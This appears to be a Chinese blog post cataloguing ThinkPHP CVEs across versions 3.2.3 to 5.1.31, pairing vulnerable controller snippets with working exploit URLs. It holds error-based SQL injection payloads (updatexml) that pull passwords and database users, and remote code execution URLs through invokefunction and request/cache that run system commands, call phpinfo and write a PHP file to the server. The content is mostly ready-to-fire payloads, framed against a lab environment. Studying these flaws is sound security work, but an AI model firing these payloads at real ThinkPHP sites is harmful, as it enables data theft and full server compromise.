ThinkPHP漏洞梳理

梳理下Thinkphp近几年爆出的重要CVE漏洞。

ThinkPHP 3.2.3

where注入

在IndexController.class.php中创建一个文件：

public function index(){
    $data = M('user')->find(I('GET.id'));
    var_dump($data);
}

访问http://localhost/tp3.2.3/index.php?id[where]=3 and 1=updatexml(1,concat(0x7,(select password from user limit 1),0x7e),1)%23

bind 注入

举例：

public function index(){
    $User = M("user");
    $user['id'] = I('id');
    $data['username'] = I('username');
    $data['password'] = I('password');
    $valu = $User->where($user)->save($data);
    var_dump($valu);
}

访问：

1	http://localhost/tp3.2.3/index.php?username=admin&passwrd=123&id[]=bind&id[]=1 and updatexml(1,concat(0x7,(selectpassword from user limit1),0x7e),1)

ThinkPHP 5.0.15

update/insert 注入

前提：app_debug开为true，调用insert或者update函数

在application/index/controller/Index.php中插入:

public function index()
{
    $username = input('get.username/a');
    $res = db('user')->where(['id'=> 1])->insert(['username'=>$username]);
    var_dump($res);
}

访问：

1	http://localhost/tp5.0.15/public/index.php?username[0]=incusername[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1

ThinkPHP 5.1.22

order by 注入

前提：app_debug开为true，同时受到影响的还有3.2.3及以下的版本

在application/index/controller/Index.php中插入：

public function index()
{
    $data=array();
    $data['username']=array('eq','admin');
    $order=input('get.order');
    $m=db('user')->where($data)->order($order)->find();
    dump($m);        
}

访问：

1	http://localhost/tp5.1.22/public/?order[id`\|updatexml(1,concat(0x3a,user()),1)%23]=1

ThinkPHP5.0.23及5.1.31以下版本

漏洞环境源码：

1	https://github.com/vulnspy/thinkphp-5.1.29

执行系统命令：

1	http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

1	http://tp.vsplate.me/public/index.php?s=/index/\think\request/cache&key=ls%20-l\|system

执行phpinfo：

1	http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

1	http://tp.vsplate.me/public/index.php?s=/index/\think\request/cache&key=1\|phpinfo

写info.php文件：

1	http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php

1	http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E